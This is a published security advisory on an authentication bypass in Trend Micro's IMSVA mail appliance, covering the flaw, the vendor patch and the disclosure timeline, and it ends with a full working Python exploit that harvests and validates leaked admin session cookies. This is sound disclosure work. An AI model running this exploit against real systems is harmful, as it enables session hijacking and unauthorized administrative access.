Trend Micro IMSVA Management Portal 9.1.0.1600 Authentication Bypass

2018-02-09T00:00:00
ID PACKETSTORM:146324
Type packetstorm
Reporter Matthew Bergin
Modified 2018-02-09T00:00:00

Description

                                        
                                            `KL-001-2018-006 : Trend Micro IMSVA Management Portal Authentication Bypass  
  
Title: Trend Micro IMSVA Management Portal Authentication Bypass  
Advisory ID: KL-001-2018-006  
Publication Date: 2018.02.08  
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-006.txt  
  
  
1. Vulnerability Details  
  
Affected Vendor: Trend Micro  
Affected Product: InterScan Mail Security Virtual Apppliance  
Affected Version: 9.1.0.1600  
Platform: Embedded Linux  
CWE Classification: CWE-522: Insufficiently Protected Credentials, CWE-219: Sensitive Data Under Web Root  
Impact: Authentication Bypass  
Attack vector: HTTPS  
  
2. Vulnerability Description  
  
Any unauthenticated user can bypass the authentication process.  
  
3. Technical Description  
  
The web application is plugin-based and allows widgets to  
be loaded into the application. A plugin which is loaded by  
default stores a log file of events in a directory which can be  
accessed by unauthenticated users. Files within this directory  
(such as /widget/repository/log/diagnostic.log) which contain  
cookie values can then be read, parsed, and session information  
extracted. A functional exploit is shown below.  
  
4. Mitigation and Remediation Recommendation  
  
Trend Micro has released a Critical Patch update to the  
affected versions for this vulnerability. The advisory and  
links to the patch(es) are available from the following URL:  
  
https://success.trendmicro.com/solution/1119277  
  
5. Credit  
  
This vulnerability was discovered by Matt Bergin (@thatguylevel)  
of KoreLogic, Inc.  
  
6. Disclosure Timeline  
  
2017.08.11 - KoreLogic submits vulnerability details to Trend Micro.  
2017.08.11 - Trend Micro confirms receipt.  
2017.09.15 - KoreLogic asks for an update on the triage of the  
reported issue.  
2017.09.15 - Trend Micro informs KoreLogic that the issue is in  
remediation but there is no expected release date yet.  
2017.09.25 - 30 business days have elapsed since the vulnerability  
was reported to Trend Micro.  
2017.10.06 - Trend Micro informs KoreLogic that the issue will not  
be addressed before the 45 business-day deadline. They  
ask for additional time for the details to remain  
embargoed in order to complete QA on the proposed fix.  
2017.10.06 - KoreLogic agrees to extend the disclosure timeline.  
2017.10.17 - 45 business days have elapsed since the vulnerability  
was reported to Trend Micro.  
2017.11.02 - Trend Micro notifies KoreLogic that the Critical Patch  
for IMSVA 9.1 (Critical Patch 1682) has gone live,  
but they are still working on the patch for IMSVA 9.0.  
2017.11.07 - 60 business days have elapsed since the vulnerability  
was reported to Trend Micro.  
2017.12.21 - 90 business days have elapsed since the vulnerability  
was reported to Trend Micro.  
2017.12.28 - Trend Micro notifies KoreLogic that the IMSVA 9.0  
Critical Patch is being localized for foreign language  
customers. Expected release date is late January 2018.  
2018.01.18 - Trend Micro notifies KoreLogic that the expected release  
date for the IMSVA 9.0 Critical Patch and the advisory  
is to be January 31, 2018.  
2018.01.23 - 110 business days have elapsed since the vulnerability  
was reported to Trend Micro.  
2018.01.31 - Trend Micro releases the advisory associated with this  
vulnerability and the related Critical Patches.  
2018.02.08 - KoreLogic public disclosure.  
  
7. Proof of Concept  
  
#!/usr/bin/python3  
  
  
from argparse import ArgumentParser  
from ssl import _create_unverified_context  
from time import mktime  
from urllib.request import HTTPSHandler, HTTPError, Request, urlopen, build_opener  
  
  
banner = '''Trendmicro IMSVA 9.1.0.1600 Management Portal Authentication Bypass  
{}'''.format('-'*67)  
  
  
class Exploit:  
def __init__(self, args):  
self.target_host = args.host  
self.target_port = args.port  
self.list_all = args.ls  
self.sessions = []  
self.session_latest_time = None  
self.session_latest_id = None  
self.sessions_active = []  
return None  
  
def is_target(self):  
url_loginpage = Request('https://{}:{}/loginPage.imss'.format(self.target_host, self.target_port))  
url_loginjsp = Request('https://{}:{}/jsp/framework/login.jsp'.format(self.target_host, self.target_port))  
if urlopen(url_loginpage, context=_create_unverified_context()).getcode() == 200:  
try:  
urlopen(url_loginjsp, context=_create_unverified_context())  
except HTTPError as e:  
if e.code == 403:  
return True  
else:  
return False  
return False  
  
def get_sessions(self):  
url_vulnpage = Request('https://{}:{}/widget/repository/log/diagnostic.log'.format(self.target_host,  
self.target_port))  
vuln_obj = urlopen(url_vulnpage, context=_create_unverified_context())  
if vuln_obj.getcode() == 200:  
vuln_pagedata = vuln_obj.read()  
for line in vuln_pagedata.decode('utf8').split('\n'):  
if 'product_auth' in line and 'JSEEEIONID' in line:  
self.sessions.append((line.split(',')[0], line.split(',')[-1].split(' ')[1].split(':')[1]))  
else:  
return False  
return True  
  
def find_latest(self):  
for session in list(set(self.sessions)):  
year, month, day = session[0].split(' ')[0].split('-')  
hour, minute, second = session[0].split(' ')[1].split(':')  
session_time = mktime((int(year), int(month), int(day), int(hour), int(minute), int(second), 0, 0, 0))  
if self.session_latest_time is None:  
self.session_latest_time = session_time  
if session_time > self.session_latest_time:  
self.session_latest_time = session_time  
self.session_latest_id = session[1]  
if self.list_all:  
if self.is_session_alive():  
self.sessions_active.append((self.session_latest_time, self.session_latest_id))  
return True  
  
def is_session_alive(self):  
url_consolepage = Request('https://{}:{}/console.imss'.format(self.target_host, self.target_port))  
opener = build_opener(HTTPSHandler(context=_create_unverified_context()))  
opener.addheaders.append(('Cookie', 'JSESSIONID={}'.format(self.session_latest_id)))  
console_obj = opener.open(url_consolepage)  
if console_obj.getcode() == 200:  
console_pagedata = console_obj.read().decode('utf8')  
if 'parent.location.href="/timeout.imss"' in console_pagedata:  
return False  
else:  
return False  
return True  
  
def run(self):  
if self.is_target():  
if self.get_sessions():  
print('[-] Leaked {} sessions'.format(len(self.sessions)))  
self.find_latest()  
if self.list_all and self.sessions_active:  
print('[+] Active sessions leaked.')  
sessions = []  
for entry in list(set(self.sessions_active)):  
sessions.append(entry[1])  
for session in list(set(sessions)):  
print('Set-Cookie: JSESSIONID={}'.format(session))  
elif self.is_session_alive():  
print('[+] Active session leaked.')  
print('Set-Cookie: JSESSIONID={}'.format(self.session_latest_id))  
return True  
else:  
print('[-] {} sessions leaked but none are active.'.format(len(self.sessions)))  
return False  
else:  
return False  
else:  
return False  
return False  
  
  
if __name__ == '__main__':  
print(banner)  
arg_parser = ArgumentParser(add_help=False)  
arg_parser.add_argument('-H', '--help', action='help', help='Help')  
arg_parser.add_argument('-h', '--host', default=None, required=True, help='Target host')  
arg_parser.add_argument('-p', '--port', default=8445, type=int, help='Target port')  
arg_parser.add_argument('-l', '--ls', action='store_true', default=False, help='List all sessions (noisy)')  
  
args = arg_parser.parse_args()  
  
Exploit(args).run()  
  
  
The contents of this advisory are copyright(c) 2018  
KoreLogic, Inc. and are licensed under a Creative Commons  
Attribution Share-Alike 4.0 (United States) License:  
http://creativecommons.org/licenses/by-sa/4.0/  
  
KoreLogic, Inc. is a founder-owned and operated company with a  
proven track record of providing security services to entities  
ranging from Fortune 500 to small and mid-sized companies. We  
are a highly skilled team of senior security consultants doing  
by-hand security assessments for the most important networks in  
the U.S. and around the world. We are also developers of various  
tools and resources aimed at helping the security community.  
https://www.korelogic.com/about-korelogic.html  
  
Our public vulnerability disclosure policy is available at:  
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt  
  
`